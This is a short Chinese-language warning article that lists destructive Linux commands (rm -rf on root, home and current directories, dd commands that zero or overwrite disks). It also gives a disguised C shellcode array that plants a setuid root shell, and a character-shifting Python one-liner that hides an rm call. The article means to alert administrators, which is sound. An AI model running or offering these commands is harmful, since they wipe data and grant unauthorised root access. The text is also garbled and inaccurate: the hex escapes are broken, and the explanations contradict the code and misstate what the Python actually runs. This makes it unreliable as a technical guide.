rm這個命令對於大多數運維工程師來說確實是一條需要謹慎使用的命令,以下這些命令都非常直觀,相信大部分業內的小夥伴都清楚。
rm -rf / 遞歸刪除根目錄下的全部內容
rm -rf . 遞歸刪除當前目錄下的全部內容
rm -rf * 遞歸刪除當前目錄下的全部內容
rm -rf * or rm -rf *.* 同上
rm -rf ~ / & 刪除根目錄和HOME目錄,即使你不是root,HOME目錄還是不能倖免。
dd if=/dev/zero of=/dev/sda 全部硬盤清零。
dd if=/dev/sda of=/dev/sdb 用第一塊硬盤的內容覆蓋第二塊的內容。
dd if=something of=/dev/sda 往硬盤上寫垃圾數據。
dd 是 Linux/UNIX 下的一個非常有用的命令,作用是用指定大小的塊拷貝一個文件,並在拷貝的同時進行指定的轉換。
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
“x6ex2fx73x68x00x2dx63x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
上面的內容看起來似乎是一堆沒有意義的亂碼,實際運行的是“rm -rf ~ / & ”,它藏在十六進制hex中,運行這個程序你就可以不輸入密碼取得系統的 root 權限,破壞性極大。
python -c ‘import os; os.system(“”.join([chr(ord(i)-1) for i in “sn!.sg! “]))’
這是一段Python代碼,懂Python的小夥伴應該能看明白,ord函數把字符串"sn!.sg! "轉化為數值,再把這些數值減一,chr函數又把全部數值轉化為字符,實際該語句執行的是:rm -rf *。
相關推薦
